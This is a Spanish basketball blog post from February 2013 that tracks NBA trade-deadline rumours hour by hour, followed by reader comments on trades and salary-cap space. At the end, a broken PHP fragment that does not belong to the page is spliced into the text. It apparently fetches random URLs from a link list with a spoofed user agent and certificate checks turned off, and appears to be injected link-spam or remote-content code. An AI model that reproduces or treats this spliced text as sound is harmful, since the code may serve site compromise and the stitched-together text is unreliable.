Rumorología variada

21 de February de 2013 por txusma

Aquí estamos de nuevo, como cada año por estas fechas. Se acerca la fecha límite para los traspasos y los rumores se suceden. Hasta el momento sólo se ha llevado a cabo un movimiento, el que acabó con Rudy Gay en los Raptors, Ed Davis y Tayshaun Prince en los Grizzlies y Jose Calderon en los Pistons. Un traspaso de calidad, porqué no decirlo, y que de momento parece dar buenos resultados a los 3 equipos implicados.

Vamos a repasar qué podemos esperar de estos pocos días que quedan para que finalice el período de traspasos. Recordemos que será el día 21 de Febrero:

20h00, 21 de Febrero

– Los Celtics se van a hacer con Jordan Crawford, según ha anunciado David Aldridge. Informa Yahoo! que es a cambio de Leandro Barbosa, y no Fab Melo como se especuló en principio.
– Los Heat mandan a Dexter Pittman y una 2ª ronda a los Grizzlies a cambio de una trade exception. Miami hace hueco en la plantilla para optar a los jugadores que sean cortados.
– Los Hawks están interesados en DeJuan Blair, a quien los Spurs buscan destino.
– Se confirma el traspaso entre Suns y Raptors: Telfair por Haddadi y una 2ª ronda.

19h30, 21 de Febrero

– Celtics y Wizards discuten un posible traspaso: Jordan Crawford por Fab Melo.
– Los Warriors buscan destino para Tyler y Jenkins, con la idea de situarse por debajo del impuesto de lujo.
– Los Rockets se olvidan de Josh Smith, y los Bucks se confirman como principal candidato a hacerse con el todavía jugador de los Hawks.
– Mozgov y Redick, cada vez más cerca de seguir en Nuggets y Magic.

18h30, 21 de Febrero

Nada se confirma pero siguen apareciendo posibles escenarios de traspaso con nombres más o menos importantes:

– Suena, de nuevo, un posible traspaso entre Celtics y Clippers. La especulación más reciente es que los Celtics aceptarían un Bledsoe + DeAndre Jordan por KG.
– Marc Stein señala que Danny Ainge vuelve a fijarse en Tyreke Evans, aunque los Kings parecen más interesados en desprenderse de Aaron Brooks.
– Wojnarowski asegura que los Spurs son una opción para JJ Redick, pero una bastante improbable. Los esfuerzos de Buford no serán suficientes.
– Los Heat son otro equipo interesado en Mozgov, pero es difícil pensar un escenario en el que podrían hacerse con él.
– Los Mavs siguen tras un base y Beno Udrih se une a la lista de posibles. Y, aunque no es un base, Jordan Crawford también está entre los objetivos de Cuban.
– Se está dando por hecho un traspaso entre Raptors y Suns que enviaría a Haddadi y una 2ª ronda a Phoenix a cambio de Sebastian Telfair.

16h30, 21 de Febrero

Menos de 4 horas para que finalice el plazo de traspasos y los grandes nombres siguen sin moverse. Eso sí, rumores no faltan. Los Bucks parecen los mejores situados para hacerse con Josh Smith. Los Bucks enviarían a Monta Ellis y Ekpe Udoh a Atlanta a cambio del alero y de Devin Harris. Siguen las conversaciones pero los rumores suenan fuerte. De todas maneras, hay que contar con los Rockets que podrían destinar su espacio salarial y alguna de sus recientes adquisiciones (Francisco García) para hacerse con Josh Smith.

Parece que los Magic ya han recibido ofertas que implicarían primera rondas del draft a cambio de JJ Redick pero de equipos punteros que no escogerían de los primeros precisamente. Los Bucks no se olvidan de él por si acaban traspasando a Monta Ellis. Así como están las cosas y según algunas informaciones, JJ Redick podría quedarse en Orlando e incluso renovar por la franquicia en verano.

Más cosas:

– Los Pacers intentan traspasar a DJ Augustine mientras que a los Warriors les encantaría deshacerse de alguno de sus hombres de banquillo para aligerar nóminas. Gerald Green y Tyler Hansbrough también están en el mercado.
– Los Heat ofrecen a Dexter Pittman, los Celtics a Fab Melo, los Lakers a Steve Blake, Chris Duhon, Darius Morris y Devin Ebanks… Suena a mercadillo del barato.
– Los Raptors buscan base suplente y están en contacto con los Suns por Sebastian Telfair y con los Thunder por Eric Maynor.
– Los Mavs también buscan base. Beno Udrih podría ser su hombre si los Bucks no lo necesitan para hacerse con Josh Smith.
–  Timofey Mozgov interesan en Minnesota y New York.

De todas manera ya avisamos que no es debéis sentir muy decepcionados si al final no hay grandes traspasos. El nuevo convenio colectivo está frenando a muchos equipos que ya no quieren gastar dinero muy alegremente. Creo que los jugadores que acaban contrato van a recibir bastante menos dinero del que esperan.

11h00, 21 de Febrero

Josh Smith sigue en Atlanta y JJ Redick en Orlando. Este podría ser el resumen de un insulso, hasta el momento, trade deadline mínimamente amenizado por los Rockets. Como sería un poco triste dejar el resumen aquí podemos apuntar que los Spurs también se unen a la puja por el jugador de los Magic.  Habrá que ver que pueden ofrecer ya que los de Florida no quieren menos de una 1ª ronda del draft. Las apuestas porque tanto Smith como Redick acaben la temporada en sus respectivas franquicias aumentan.

Hablando de otros jugadores, Jordan Crawford tiene muchos números de abandonar los Wizards una vez ha sido relegado al banquillo en favor del rookie Bradley Beal; los Rockets buscan aligerar más su nómina de power-forwards y estarían dispuestos a traspasar a Terrence Jones a cambio de una 1ª ronda; los Celtics también buscan traspasar a Fab Melo, y finalmente, se habla de un traspaso entre Jazz y Wolves con Paul Millsap y Derrick Williams como implicados.

02h00, 21 de Febrero

Un año más, Daryl Morey le da vidilla al trade deadline. Los Rockets envían a Patrick Patterson, Cole Aldrich y Toney Douglas a Sacramento Kings a cambio de Thomas Robinson, Francisco García, Honeycutt y una 2ª ronda. Además, traspasan a Marcus Morris a Phoenix -donde se reunirá con su hermano- a cambio de una segunda ronda.

18h00, 20 de Febrero

Josh Smith sigue en Atlanta y cada vez falta menos tiempo. Los Bucks siguen tratando de convencer a Atlanta pero estos quieren, además de a Monta Ellis, algún expiring. Lo que parece claro es que Brandon Jennings no se va a mover así que los Mavs se quedarán con las ganas.

El otro hombre de estos días es JJ Redick. Se ha hecho público que piensa pedir unos 40 millones por 4 años para renovar algo que su franquicia actual no está dispuesto a ofrecerle. En Orlando pensaban más en algo cercano a los 5 millones. De todas maneras, ningún equipo piensa pagarle más de 7 kilos al año. Memphis parece que también está interesado.

Muy interesante el rumor que apunta a un posible traspaso entre Thunder y Suns que acabaría con Marcin Gortat al lado de Durant a cambio de Kendrick Perkins, Jeremy Lamb y una primera ronda.

Finalmente, Gerald Henderson ha sido colocado en el mercado por los Bobcats. Podría abandonar la franquicia a cambio de una primera ronda del draft.

09h30, 20 de Febrero

Menos de 30 horas para que finalice el plazo de traspaso y seguimos en calma chicha. Parece que todos los equipos están esperando que los Hawks traspasen a Josh Smith para iniciar sus movimientos. En el día de ayer lo que más sonó fue un traspaso prácticamente a pelo entre Hawks y Bucks para intercambiar a Smith por Monta Ellis pero aún no tenemos nada confirmado. Ojo porque hay analistas que no descartan que Smith acabe en los Lakers y Dwight Howard en los Hawks. También apareció el rumor de que los Magic habían ofrecido a JJ Redick a los Bucks a cambio del alero Luc R. Mbah-a-Moute y una primera ronda del draft aunque otras informaciones apuntan a que la oferta llegó de los Bucks.

16h00, 19 de Febrero

Salta a la palestra las negociaciones que podrían estar llevando a cabo Orlando Magic y New York para intercambiar a Iman Shumpert por JJ Redick. Tanto Redick como la franquicia están abiertos a la posibilidad de renovar pero si aparece un buen traspaso no dudarán por Florida.

En la anterior actualización hablábamos de Eric Gordon pero olvidamos mencionar que Gordon es de los pocos jugadores (como Garnett) que tienen una cláusula en su contrato que les permite vetar un traspaso. La del jugador de los Hornets expira el 14 de Julio así que lo más probable es que no sea traspasado en febrero pero que su nombre vuelva a sonar en verano. Un traspaso Gordon – Danny Granger entra dentro de las posibilidades.

Apuntad más nombres que suena: Eric Maynor, Luke Ridnour, DeJuan Blair, Omri Casspi, Jordan Crawford, RIP Hamilton y Sebastian Telfair.

9h30, 19 de Febrero

A cerca de 60 horas para que acabe el plazo de traspasos en la NBA seguimos sin confirmación de ningún movimiento. O se está preparando algo gordo o al final todo quedará en agua de borrajas.

Los Hawks son los más interesados en animar el mercado con el traspaso de Josh Smith. Como todos sabéis, el alero acaba contrato en verano y en la ciudad de la Coca-Cola nadie confia en que quiera renovar. Entre los destinos que suenan se mantienen los Nets, con aquel Humpries-Brooks como moneda de cambio y los Mavs, que podrían ofrecer el expiring de Chris Kaman y un par de jóvenes; los Suns y los Bucks pujando fuerte pero temerosos de que Smith no quiera renovar con ellos tampoco en verano, y se incorporan los Wizards que han declarado que todos sus jugadores son transferibles menos John Wall, Nene y Bradley Beal. Como dice mi padre: “nos ha jodido mayo con las flores”. Los que parece que vuelven a entrar en la pomada son los Celtics a pesar de que cualquier traspaso debería ser construido alrededor de Paul Pierce. Finalmente, los Rockets, declarados fans de “J-Smoove” tienen previstos esperar al verano para ofrecer por el jugador el máximo permitido así que ya pueden ir todos con cuidado. Recordemos que el equipo propietario del jugador siempre podrá ofrecer más que cualquier otra franquicia. No es el juego de tronos pero se le parece.

Eric Gordon es otro de esos nombres que llevamos oyendo cerca de 2 años. Cuando parecía que empezaba a encontrar la estabilidad en New Orleans, arrecían de nuevo rumores que el involucran. Se ha informado que Dallas, Houston y Golden State podrían estar interesados pero son los Bucks los que podrían tener un ojo puesto en el escolta de los Hornets. El cambio de agente de Brandon Jennings ha mosqueado a la franquicia y últimamente parece confirmado que Monta Ellis no ejercerá su Player Option y saldrá también al mercado en verano. Milwaukee podría ofrecer a Ellis y alguna cosa más (¿Tobias Harris?) a cambio de Gordon y estabilizar sus posiciones exteriores.

Lo que parece que se enfría es el traspaso de Andrea Bargnani y es que ya avisamos que nos sería fácil colocar al italiano. Iman Shumpert es otro de los nombres que ha estado sonando estos días. Según algunas informaciones el jugador habría pedido el traspaso pero ayer mismo el agente declaró que eso no era cierto. Nombre a vigilar en las próximas horas. Otros nombres en el disparadero son los de Raja Bell y JJ Hickson.

11h30, 18 de Febrero

Ha aparecido con fuerza un rumor que sitúa a Eric Bledsoe en los Jazz a cambio de Paul Millsap. Parece un traspaso con sentido para todas las partes. Los Jazz consiguirían un buen jugador a cambio de otro que acaba contrato este misma temporada, Bledsoe consiguirá los minutos de base titular que necesita, los Clippers añadirán opciones a su juego interior y Paul Millsap podría firmar un buen contrato con una franquicia ganadora. 

0h30, 17 de Febrero

En las últimas horas ha aparecido el rumor de que los Lakers se habrían interesado en un traspaso entre ellos y los Celtics con Dwight Howard y Rajon Rondo como implicado, aunque Mitch Kupchack ya lo ha desmentido. Evidentemente, los Celtics solo harían un traspaso de este tipo si tuvieran la seguridad de que Howard renovaría con ellos al finalizar la temporada. Yo no le daría mucha credibilidad a semejante movimiento.

Lo que sí parece que va más en serio es el rumor que sitúa a Kevin Garnett, nada menos que DeAndre Jordan y Eric Bledsoe. Hace unos días Garnett dijo que moriría de verde pero su amistad con Chauncey Billups y una casa en Malibú podrían hacerle reconsiderar su decisión. Para el “vecino pobre” sería una especie de all-in y para los Celtics un inicio de reconstrucción en toda regla. De llevarse a cabo este movimiento detrás podrían venir otros como un Rondo por Millsap o Jefferson, o la salida de Paul Pierce. Según como, los verdes seguirían siendo competitivos esta misma campaña y habría asentado una buena bases de cara a seguir siéndolo en años venideros. De hecho, se especula que los Celtics aceptarían esta oferta con los ojos cerrados pero no la directiva de los Clippers aunque Vinnie del Negro sueñe con Garnett por las noches.

Obviando los rumores anteriores, Josh Smith es, sin duda, la estrella del mercado. El jugador de los Hawks acaba contrato el 30 de Junio y en Atlanta están estudiando posibles movimientos para no verse compuestos y sin novio en verano. Todo el mundo parece tener claro que Smith no acabará la temporada en los Hawks pero a pesar de eso no hay un rumor claro sobre que equipo podría hacerse con sus servicios. En los últimos días se ha hablado de un traspaso con los Sixers que acabaría con Evan Turner y Spencer Hawes en los Hawks, pero por la ciudad del amor fraterno no están muy por la labor. Hoy mismo aparece en algún medio que los Bucks podrían ofrecer a Brandon Jennings y Ersan Ilyasova, pero en otro sitios dan casi por seguro que Jennings no se moverá de Milwaukee. Tampoco hay indicios de conversaciones con Spurs o Mavs, por más que los medios se hagan pajas mentales. Los nombres de Suns, Rockets y Bobcats también han aparecido pero son los Nets los que más suenan. Los de Brooklyn habrían ofrecido a Kris Humphries y Marshoon Brooks pero la oferta se antoja insuficiente si no vienen acompañados de algunas rondas de draft.

Si Kris Humphries no acaba en los Hawks es posible que lo haga en los Bobcats a cambio de Ben Gordon. Los Nets necesitan tiro de 3 y los Bobcats rebote, todo cuadra. El ex de los Bulls seguro que sale antes del 21 de febrero y más teniendo en cuenta su mala relación con los técnicos de los Bobcats y algún que otro enfrentamientos que ha tenido con Dunlap. Parece que los Bobcats también han sondeado a los Raptors para llevar a cabo un intercambio Gordon – Andrea Bargnani pero estos no ven claro incorporar a un jugador que taparía a Terrence Ross y Alan Anderson.

De hecho, en los últimos días se ha hablado de un Carlos Boozer por Andrea Bargnani y es que parece ser que no es nada fácil colocar al italiano. Si hay un jugador que cueste de colocar más que Bargnani ese es Boozer así que resulta difícil creer que los Raptors, tras incorporar a Rudy Gay vayan a comerse ahora los 9’1 millones más que ha de cobrar el de los Bulls en los 2 años que tiene firmados ambos jugadores.

Antes hemos comentado fugazmente que no se tiene claro que pasará con Brandon Jennings. El base de los Bucks termina contrato este verano y el periodista de ESPN.com, Chad Ford, comentó que el jugador tenía diferencias irreconciliables con los Bucks pero el mismo jugador lo negó al día siguiente categóricamente. Por si acaso, los Mavs ya se han situado en posición de salida. El que sí tiene todos los números de volar lejos de Milwaukee es Samuel Dalembert. La irrupción de Larry Sanders le ha dejado un tanto arrinconado. Sus buenos números como titular tras la lesión de éste, no hacen sinó elevar su caché.

JJ Redick es otro de los protagonistas de estas fechas. Su gran temporada no está pasando desapercibida y franquicias como Bulls, Pacers o Bucks han preguntado por él. Orlando pide mucho a cambio y el jugador realmente no quiere marcharse. Preferiría que le ofrecieran una buena renovación así que las posibilidades de traspaso está al 50%.

El año pasado por estas fechas se hablaba de que los Jazz traspasarían a Al Jefferson o Paul Millsap para dar minutos a Favors y Kanter y al final los rumores quedaron en nada. Este año la situación es más grave porque tanto Jefferson como Millsap acaban contrato y los Jazz se pueden ver como pierden en verano a ambos jugadores a cambio de nada (si es que se puede considerar nada a 22 millones de hueco salarial). Primero parecía que sería Jefferson el que saldría (se le ha colocado en los Suns) pero ahora es Millsap el que tiene más papeletas. Algún rumor le sitúa en los Nets.

Comenta

141 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Pero si no lo cogen ahora, no pueden fichar a Smith y Howard ¿no? No tienen tanto espacio salarial, menos con Asik por medio, a no ser que se hiciera por medio de sign & trade… que aún así estaría dudoso que pudieran, porque deberían adquirir algún mal contrato.

      Citar

  2. Jose Luis dice:
    #2

    Josh Smith se ha presentado a entrenar en la instalaciones de Atlanta.

      Citar

  3. MagicJohnson32 dice:
    #3

    No estoy seguro. Los Rockets van a tener mucho espacio este verano. Lin y Asik todavía estarán cobrando 5 kilos, Parsons no llegará a 1 k, Thomas Robinson cobrará unos 3, Royce White, Montejunas y Terrence Jones entre 1 y 2 k, más los 13 de Harden y… ¿tienen a alguien más con contrato? Ya digo, mucho margen para maniobrar.

      Citar

  4. Jose Luis dice:
    #4

    Tienen en torno a 30 + Robinson, es decir, 33. con 27 millones no llegan a Smith y Howard juntos ni de coña. Si mediante intercambio mandan a Asik y Robinson a Atlanta, tendrían 25, + 17 de smith = 42, no creo que les llegue para fichar a Howard, aparte de que algún contrato malo tendría que ir a Houston. En cambio si lo consiguen via intercambio, se traen sus derechos Bird, Fichan a Howard (33 + 20 = 53) y pueden renovar a Smith aún pasándose del tope. Incluso podrían fichar algún agente libre por 6 millones y usar las excepciones y después renovar a Smith.

      Citar

  5. txusma dice:
    #5

    Jose Luis:
    Josh Smith se ha presentado a entrenar en la instalaciones de Atlanta.

    Pero como se atreve!!

    A los Hawks un pívot como Asik no les viene mal porque Horford podría jugar de 4 que es lo q quiere.

      Citar

  6. Jose Luis dice:
    #6

    Lo que quiere y donde mejor rinde, a mi juicio.

      Citar

  7. MagicJohnson32 dice:
    #7

    Josh Smith es trending topic en España, jajaja…

      Citar

  8. MagicJohnson32 dice:
    #8

    Jose Luis:
    Tienen en torno a 30 + Robinson, es decir, 33. con 27 millones no llegan a Smith y Howard juntos ni de coña. Si mediante intercambio mandan a Asik y Robinson a Atlanta, tendrían 25, + 17 de smith = 42, no creo que les llegue para fichar a Howard, aparte de que algún contrato malo tendría que ir a Houston. En cambio si lo consiguen via intercambio, se traen sus derechos Bird, Fichan a Howard (33 + 20 = 53) y pueden renovar a Smith aún pasándose del tope. Incluso podrían fichar algún agente libre por 6 millones y usar las excepciones y después renovar a Smith.

    Pero no necesitan fichar a ambos por 27 millones. Necesitan fichar a uno y seguir por debajo, y eso sí es más que factible,

      Citar

  9. Jose Luis dice:
    #9

    Qué poder tienen Twitter y la NBA

      Citar

  10. Jose Luis dice:
    #10

    Ah bueno, fichar a uno sí. Pensaba en el caso de querer a los dos. Lin, Harden, Parsons, Smith, Asik es un muy buen quinteto.

      Citar

  11. safd dice:
    #11

    Mmmm creo que la gente se piensa que Asik cobrara 15M en la tercera temporada, pero no, cobrara solo 8m tiene un contrato de 8M en cada año, porque a pesar de que la primera oferta era 5-5-15 (o algo asi) para que chicago no lo pudiese retener, utilizaron una excepcion que no me acuerdo como se llamaba, y el contrato se quedo en 8-8-8; al igual que con Lin… Vaya, 8M por Asik que promedia un doble doble… vaya negocio, me encanta Morey

    Aunque en hoopshype los contratos de Lin y Asik estan mal, en otras como basketball reference podeis ver que son 8-8-8

      Citar

  12. Jose Luis dice:
    #12

    ¿Completamente seguro de eso safd? Bueno, tendrían 39 millones en nómina, aún les daría para incorporar a Smith o Howard, pero si no es por intercambio en estas horas Smith, que se olviden de reunir a los dos.

      Citar

  13. Jose Luis dice:
    #13

    Por lo visto los Celtics vuelven a la carga por Tyreke Evans.

      Citar

  14. MagicJohnson32 dice:
    #14

    Durante las casi dos horas que el blog ha estado caído se han producido la friolera de… cero traspasos.

      Citar

  15. Ruxixón dice:
    #15

    Jose Luis:
    ¿Completamente seguro de eso safd? Bueno, tendrían 39 millones en nómina, aún les daría para incorporar a Smith o Howard, pero si no es por intercambio en estas horas Smith, que se olviden de reunir a los dos.

    Lo que dice safd no es la primera vez que lo leo hoy y es cierto que en BR habla de 8.3 millones cada una de las tres temporadas.

    A mí Parsons me parece un jugador muy de McHale y dudo mucho que Houston lo traspase por Smith.Otra cosa es T-Rob y Asik,aunque jugándote los PO como estás no vería demasiado sentido al traspaso si te tienes que poner a asignar roles,distribuir minutos,crear química de equipo…

      Citar

  16. MagicJohnson32 dice:
    #16

    Vamos actualizando el artículo cada poco, en cuanto surgen 4-5 rumores de interés.

      Citar

  17. MagicJohnson32 dice:
    #17

    En la última hora…
    19h30, 21 de Febrero

    – Celtics y Wizards discuten un posible traspaso: Jordan Crawford por Fab Melo.
    – Los Warriors buscan destino para Tyler y Jenkins, con la idea de situarse por debajo del impuesto de lujo.
    – Los Rockets se olvidan de Josh Smith, y los Bucks se confirman como principal candidato a hacerse con el todavía jugador de los Hawks.
    – Mozgov y Redick, cada vez más cerca de seguir en Nuggets y Magic.

    18h30, 21 de Febrero

    Nada se confirma pero siguen apareciendo posibles escenarios de traspaso con nombres más o menos importantes:

    – Suena, de nuevo, un posible traspaso entre Celtics y Clippers. La especulación más reciente es que los Celtics aceptarían un Bledsoe + DeAndre Jordan por KG.
    – Marc Stein señala que Danny Ainge vuelve a fijarse en Tyreke Evans, aunque los Kings parecen más interesados en desprenderse de Aaron Brooks.
    – Wojnarowski asegura que los Spurs son una opción para JJ Redick, pero una bastante improbable. Los esfuerzos de Buford no serán suficientes.
    – Los Heat son otro equipo interesado en Mozgov, pero es difícil pensar un escenario en el que podrían hacerse con él.
    – Los Mavs siguen tras un base y Beno Udrih se une a la lista de posibles. Y, aunque no es un base, Jordan Crawford también está entre los objetivos de Cuban.
    – Se está dando por hecho un traspaso entre Raptors y Suns que enviaría a Haddadi y una 2ª ronda a Phoenix a cambio de Sebastian Telfair.

      Citar

  18. Jose Luis dice:
    #18

    Jordan Crawford a Boston por Barbosa, quién lesionado para toda la temporada y expiring, se va a Washington

      Citar

  19. Jose Luis dice:
    #19

    Jordan Crawford a Boston por Barbosa, quién lesionado para toda la temporada y expiring, se va a Washington, y además Pittman a los Grizzlies

      Citar

  20. safd dice:
    #20

    Jose Luis:
    ¿Completamente seguro de eso safd? Bueno, tendrían 39 millones en nómina, aún les daría para incorporar a Smith o Howard, pero si no es por intercambio en estas horas Smith, que se olviden de reunir a los dos.

    al 990% seguro… de hecho dicen que no van a ofertar nada por smith, ya que, si quiere llegar a houston, puede llegar en verano con el espacio salarial que tienen

      Citar

  21. Ruxixón dice:
    #21

    – Fichajazo de Boston (me sobra Terry)
    – Pittman para cubrir la baja de Haddadi (irrelevante) y reciben a Telfair que es un buen base,supongo que Bayless a jugar de 2 (no me gusta)

      Citar

  22. MagicJohnson32 dice:
    #22

    Suena mucho Redick en los últimos minutos. Josh Smith ya suena menos. Los Bucks andan metidos en ambas negociaciones.

    Y Eric Maynor se va a Portland, parece.

      Citar

  23. Simon dice:
    #23

    Me estoy poniendo palote con el equipo que puede armar Houston este verano… además ahi es un mercado grande y parece que el propietario está dispuesto a gastar lo que haga falta.

      Citar

  24. MagicJohnson32 dice:
    #24

    Ya está: Redick a los Bucks.

      Citar

  25. jose_dantley dice:
    #25

    Redick a los Bucks parece

      Citar

  26. rumbero dice:
    #26

    Que ritmazo lleváis macho, ya he dejado el Twitter sólo para ver las actualizaciones del peinado de Bynum y le voy dando al F5 por aquí,,, Redick a los Bucks, de lo más interesante junto con lo de Crawford. ¿Saltará ahora Ellis entonces? El resto, que pestiño de deadline

      Citar

  27. Esteban dice:
    #27

    redick a los bucks? salida de monta ellis a los hawks? TODA LA PINTA

    vaya q salen ganando los patos

      Citar

  28. Jose Luis dice:
    #28

    Ayón + Ish Smith + Redick x Udrih + Doron Lamb + Tobias Harris (Bucks & Orlando)

    Warrick x McRoberts (Orlando & Bobcats)

    Anthony Morrow x Dahntay Jones (Dallas & Hawks)

    Eric Maynor a Portland por una ronda, quienes tendrán que cortar a alguien

    Eso es lo último creo.

      Citar

  29. Esteban dice:
    #29

    muy pero muy buen trade para el magic, cojer a tobias HARRIS y a doron LAMB por un jugador como redick a quien no iban a renovar y no encajaba en la reconstruccion es todo un triunfo

    dallas se hace de un jugador que me gusta mucho como MORROW, con oportunidades este chaval puede anotar mucho desde mas alla del arco, un triplero nato y buen defensor, con un dt competente, puede dar mucho

      Citar

  30. Esteban dice:
    #30

    jordan crawford parece un talentoso jugador, y los celtics necesitaban un anotador que valiera pooc, tan poco como el expiring bajo de barbosa, mejor por ese precio no los habia, pero dudo que crawford rinda en los celtics, es un mal defensor y tiene mala seleccion de tiro, cosas que no perdona doc rivers, no lo veo jugando mucho

      Citar

  31. MagicJohnson32 dice:
    #31

    Ya tenéis una nueva entrada con todo lo que ha dado de sí el día, sólo cosas confirmadas.

      Citar

  32. Jose Luis dice:
    #32

    Por lo visto, Ronnie Brewer a Thunder por una segunda ronda

      Citar

  33. MagicJohnson32 dice:
    #33

    Jose Luis:
    Por lo visto, Ronnie Brewer a Thunder por una segunda ronda

    Todo eso y mucho más en http://blog.tjnba.com/2013/02/21/especial-trade-deadline-2013/

    😉

      Citar

  34. Jose Luis dice:
    #34

    @ruxixon

    Haddadi estaba en Raptors. Telfair va para suplente de Lowry. Pittman como quinto interior Grizzlie

      Citar

  35. Jose Luis dice:
    #35

    ¡¡Queremos un nuevo post!!

    ¡¡Doc Rivers a Clippers!!

      Citar

  36. nba dice:
    #36

    jorjor, parece que ya tenemos finalista en el Oeste…, los vecinos pobres se han hecho con un peazo de entrenador, me da a mi que este movimiento va a dinamitar los traspasos, que se olvide Lakers de pasar de primera ronda …

      Citar

  37. Simon dice:
    #37

    Pues yo que quereis que os diga… este movimiento “extraño” debería ser objeto de Sternato… Si hubieran hecho las cosas bien no sería mas que un equipo nuevo para Rivers… pero coño que se quisieron pasar de listos y se les calló todo lo de Garnett mas Pierce….
    y ahora Boston libera a Rivers… y va a recibir a modo de gratificación una primera ronda desprotegida de 2015 de Clippers… venga hombre… o todos negros o todos blancos…
    No es que sea ilegal liberal a Rivers pero está claro que la manera de llegar a “convencer” de liberar a Rivers es ilegal lo mires por donde lo mires… y eso es sancionable.
    Es cómo si a un ladrón lo piyas robando y no lo detienen pq todavía no ha llegado a robar…

      Citar

  38. Simon dice:
    #38

    Cayó*

      Citar

  39. Txusma dice:
    #39

    Mañana inauguraremos otros post pq los días previos del draft son de los interesantes.

    Hasta yo me tengo q poner al día que he estado 4 días totalmente desconectado!

      Citar

  40. Jose Luis dice:
    #40

    Brian Shaw coach de Denver!

      Citar

  41. Simon dice:
    #41

    Ya estaba bien que alguien apostara por el

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>